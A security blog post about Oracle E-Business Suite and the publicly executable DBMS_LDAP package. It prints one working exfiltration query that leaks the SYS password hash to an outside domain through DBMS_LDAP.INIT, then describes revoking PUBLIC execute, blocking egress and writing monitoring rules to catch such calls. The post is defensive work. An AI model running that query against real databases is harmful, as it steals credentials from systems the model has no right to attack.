Three Tier Oracle Security in London ~ Paul M. Wright

(nix, oracle, java, www, cloud ) intersect (safety, security, reliability, integrity)

Three Tier Oracle Security in London ~ Paul M. Wright RSS Feed
 

E-Business Suite Security and DBMS_LDAP.INIT

Hi Folks,

Vulnerability in E-Business Suite R12 requires non-default diagnostics mode so Low risk.
http://www.securityfocus.com/archive/1/509460
Having said that it is worth keeping an eye on Internet facing Oracle applications, though there is not a huge amount on this from O’Reilly and Apress.
Google books has a relevant book free of charge named “Security, Audit and Control Features Oracle E-Business Suite” http://books.google.co.uk/books?id=JWrCxjgsfHcC&printsec=frontcover#v=onepage&q=&f=false.
The main book for E-Business Suite security is John Abel’s though that is based on 11i of course.
Steven Chan’s blog is a good read for Oracle Apps security as well.

Other recent related reading has included http://www.databasesecurity.com/ExploitingPLSQLinOracle11g.pdf . This paper confirms the importance of firewall egress in Oracle Three Tier environments. So for instance commands like this should be prevented from exfiltrating data out of the firewall.

SELECT DBMS_LDAP.INIT((SELECT PASSWORD FROM SYS.USER$ WHERE NAME ='SYS')||'.oraclesecurity.com',80) FROM DUAL;

The executing account only needs SELECT ANY DICTIONARY, because DBMS_LDAP is publicly executable.

SQL> select grantee from all_tab_privs where table_name='DBMS_LDAP';
GRANTEE
------------------------------
PUBLIC

The server IP address has no business opening a port out of the Internet facing firewall. This command can be added to the other examples in http://www.red-database-security.com/wp/oracle_cheat_sheet.pdf

So part of the solution to this issue (along with blocking egress) is to:

SQL> conn sys as sysdba
Enter password:
Connected.
SQL> REVOKE EXECUTE ON SYS.DBMS_LDAP FROM PUBLIC;
Revoke succeeded.

But what uses this package under the hood and is there any software within the DB/Application architecture that depends on that PUBLIC execute?… Well if you have read my latest paper ~ SecuringJavaInOracle you will know that the solution is to write a Hedgehog rule on SYS.DBMS_LDAP package monitoring all calls that contain that package so you can see what actually uses it:

Object=‘SYS.DBMS_LDAP'

Note that the above rule only triggers when DBMS_LDAP is successfully executed. This rule is good for profiling the use of the package, but to alert to failed attempts to use or exploit the package, HH must alert on the text of the SQL statement as follows:

Statement matches ‘DBMS_LDAP’

This second Statement rule will alert even if the executing statement fails due to
lack of correct privilege for instance. A way to test this rule works is as follows.

Select ‘DBMS_LDAP ’from dual;

This will trigger the second rule to alert but not the first.

Using the above method we can fix security issues with low risk of affecting the application’s functionality. Real time Application Monitoring is an important part of the SDLC in mature applications, along with Static code analysis and Dynamic application testing. More on this at the upcoming ISSD Conference.

Cheers,
Paul

Leave a Reply

You must be logged in to post a comment.